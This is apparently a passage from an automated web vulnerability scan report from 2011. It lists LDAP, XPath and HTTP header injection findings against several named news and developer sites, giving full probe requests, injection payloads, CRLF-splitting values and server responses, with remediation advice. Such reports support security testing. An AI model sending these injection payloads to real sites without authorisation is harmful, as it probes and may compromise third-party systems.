href="http://www.msnbc.redacted/id/3032091/device/rss/rss.xml" xmlns:media="http://search.yahoo.com/mrss/" /><link rel="alternate" type="application/rss+xml" title="MSNBC - Top Stories" href="http://rss.msnbc.redacted/id/3032091/device/rss/rss.xml"><script language="javascript" type="text/javascript"> this.nm_bo = function (o) { //newsmenu delay if (nm_Enter) { window.clearTimeout(nm_Enter); nm_Enter = 0; } // Get initiating button if (o) { o2 = o.relatedTarget; o = o.target; } else { o = window.event.srcElement; o2 = window.ev ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /_nv/cms/*)(sn=*/faq HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:19:12 GMT Content-Length: 15040 Connection: close
GET /_nv/cms/*)!(sn=*/faq HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:19:12 GMT Content-Length: 15050 Connection: close
The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /*)(sn=*/cms/info/copyrightPolicy HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:23:02 GMT Content-Length: 15041 Connection: close
GET /*)!(sn=*/cms/info/copyrightPolicy HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:23:03 GMT Content-Length: 15051 Connection: close
The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /*)(sn=*/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:20 GMT Content-Length: 15042 Connection: close
GET /*)!(sn=*/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:20 GMT Content-Length: 15052 Connection: close
The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.
The payloads aa0cfe9036308053)(sn=* and aa0cfe9036308053)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /aa0cfe9036308053)(sn=*/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js?v=23247 HTTP/1.1 Host: www.polls.newsvine.com Proxy-Connection: keep-alive Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vid=55d515b4f7dadf9aee6395750020b187
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:36:23 GMT Connection: close Vary: Accept-Encoding Content-Length: 15039
GET /aa0cfe9036308053)!(sn=*/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js?v=23247 HTTP/1.1 Host: www.polls.newsvine.com Proxy-Connection: keep-alive Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vid=55d515b4f7dadf9aee6395750020b187
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:36:23 GMT Connection: close Vary: Accept-Encoding Content-Length: 15051
The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.
The payloads 3c3db971ca91afcd)(sn=* and 3c3db971ca91afcd)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /_vine/3c3db971ca91afcd)(sn=*/pierre HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: vid=55d515b4f7dadf9aee6395750020b187;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:23:23 GMT Content-Length: 15041 Connection: close
GET /_vine/3c3db971ca91afcd)!(sn=*/pierre HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: vid=55d515b4f7dadf9aee6395750020b187;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:23:23 GMT Content-Length: 15051 Connection: close
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 VTag: 791954442400000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:22:15 GMT Content-Length: 32230 Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he ...[SNIP]... </strong>", releaseUrl: ajaxPath + "<strong> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 VTag: 791805141200000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 14:52:30 GMT Content-Length: 32329 Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he ...[SNIP]... </strong>", releaseUrl: ajaxPath + "<strong> ...[SNIP]...
The d parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the d parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ScriptResource.axd?d=1kuLgEePUyZ5x1vAYc1EW-Krk0cguDDpiLsIYXXse8b0tAH0cpYYGD5goVWcKW0gReQra4IS5Zd75XKfurjglj0xejELjy__-RPRrABGk9h12y8wRirPHf5b2XtUjrv_5nimQtGfCP78kkUcYuOKnTR1iag1'&t=ffffffffbcc66b6e HTTP/1.1 Host: blogs.silverlight.net Proxy-Connection: keep-alive Referer: http://blogs.silverlight.net/showcasehosted/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e
Response (redirected)
HTTP/1.1 200 OK Cache-Control: public Content-Type: application/x-javascript Expires: Sun, 29 Jan 2012 20:51:02 GMT Last-Modified: Sat, 29 Jan 2011 20:51:02 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:28:36 GMT Content-Length: 99448
...//---------------------------------------------------------- // Copyright (C) Microsoft Corporation. All rights reserved. //---------------------------------------------------------- // Microsof ...[SNIP]... <f;b++)try{var a=new ActiveXObject(c[b]);a.async=false;a.loadXML(d);a.setProperty("SelectionLanguage","XPath");return a}catch(g){}}else try{var e=new window.DOMParser;return e.parseFromString(d,"text/xml")}catch(g){}return null};Sys.Net.XMLHttpExecutor=function(){Sys.Net.XMLHttpExecutor.initializeBase(this); ...[SNIP]...
3.4. http://blogs.silverlight.net/ScriptResource.axd [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://blogs.silverlight.net
Path:
/ScriptResource.axd
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ScriptResource.axd?d=1kuLgEePUyZ5x1vAYc1EW-Krk0cguDDpiLsIYXXse8b0tAH0cpYYGD5goVWcKW0gReQra4IS5Zd75XKfurjglj0xejELjy__-RPRrABGk9h12y8wRirPHf5b2XtUjrv_5nimQtGfCP78kkUcYuOKnTR1iag1&t=ffffffffbcc66b6e&1'=1 HTTP/1.1 Host: blogs.silverlight.net Proxy-Connection: keep-alive Referer: http://blogs.silverlight.net/showcasehosted/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e
Response (redirected)
HTTP/1.1 200 OK Cache-Control: public Content-Type: application/x-javascript Expires: Sun, 29 Jan 2012 23:26:23 GMT Last-Modified: Sat, 29 Jan 2011 23:26:23 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:30:23 GMT Content-Length: 99448
...//---------------------------------------------------------- // Copyright (C) Microsoft Corporation. All rights reserved. //---------------------------------------------------------- // Microsof ...[SNIP]... <f;b++)try{var a=new ActiveXObject(c[b]);a.async=false;a.loadXML(d);a.setProperty("SelectionLanguage","XPath");return a}catch(g){}}else try{var e=new window.DOMParser;return e.parseFromString(d,"text/xml")}catch(g){}return null};Sys.Net.XMLHttpExecutor=function(){Sys.Net.XMLHttpExecutor.initializeBase(this); ...[SNIP]...
The t parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the t parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ScriptResource.axd?d=1kuLgEePUyZ5x1vAYc1EW-Krk0cguDDpiLsIYXXse8b0tAH0cpYYGD5goVWcKW0gReQra4IS5Zd75XKfurjglj0xejELjy__-RPRrABGk9h12y8wRirPHf5b2XtUjrv_5nimQtGfCP78kkUcYuOKnTR1iag1&t=ffffffffbcc66b6e' HTTP/1.1 Host: blogs.silverlight.net Proxy-Connection: keep-alive Referer: http://blogs.silverlight.net/showcasehosted/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e
Response (redirected)
HTTP/1.1 200 OK Cache-Control: public Content-Type: application/x-javascript Expires: Sun, 29 Jan 2012 23:26:23 GMT Last-Modified: Sat, 29 Jan 2011 23:26:23 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:28:37 GMT Content-Length: 99448
...//---------------------------------------------------------- // Copyright (C) Microsoft Corporation. All rights reserved. //---------------------------------------------------------- // Microsof ...[SNIP]... <f;b++)try{var a=new ActiveXObject(c[b]);a.async=false;a.loadXML(d);a.setProperty("SelectionLanguage","XPath");return a}catch(g){}}else try{var e=new window.DOMParser;return e.parseFromString(d,"text/xml")}catch(g){}return null};Sys.Net.XMLHttpExecutor=function(){Sys.Net.XMLHttpExecutor.initializeBase(this); ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /news'/ HTTP/1.1 Host: entertainment.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 53218 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=7fabc37e939249ca90d016d1c2d17f62; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:46:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /video'/ HTTP/1.1 Host: entertainment.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 53218 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=6d4eeafde5e747ca8079be903574a601; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:46:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /cbk/story/Baylor-70-Colorado-66-30467175 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 248777 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=14 Date: Sat, 29 Jan 2011 23:50:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /cbk/story/Baylor-70-Colorado-66-30467175 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 248777 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=14 Date: Sat, 29 Jan 2011 23:50:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
3.10. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://msn.foxsports.com
Path:
/cbk/story/Baylor-70-Colorado-66-30467175
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /cbk/story/Baylor-70-Colorado-66-30467175?1'=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 248807 Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=6 Date: Sat, 29 Jan 2011 23:50:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
3.11. http://silverlight.codeplex.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://silverlight.codeplex.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /?1'=1 HTTP/1.1 Host: silverlight.codeplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=aa53c1dyzeonloxydyax0t0n; domain=.codeplex.com; path=/; HttpOnly X-AspNetMvc-Version: 3.0 P3P: CP="NON DSP COR ADM CUR DEV TAI OUR IND NAV PRE STA" X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:39 GMT Content-Length: 28879
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head id ...[SNIP]... <div class="MostDownloadedDescription">Html Agility Pack is an agile HTML parser library that proposes a read/write DOM and supports plain XPATH or XSLT. It allows you to parse "out of t...</div> ...[SNIP]...
4. HTTP header injectionpreviousnext There are 16 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the ES cookie is copied into the Set-Cookie response header. The payload 65c2f%0d%0a643c70ed39b was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adsc/d775684/10/38973908/decide.php HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=65c2f%0d%0a643c70ed39b
The value of the code request parameter is copied into the Location response header. The payload a2e59%0d%0a154c4e3865 was submitted in the code parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=852149&site=58143061&code=40142779a2e59%0d%0a154c4e3865&randnum=5845715 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0
The value of the site request parameter is copied into the Location response header. The payload 2d2bc%0d%0aa1ed319a68a was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
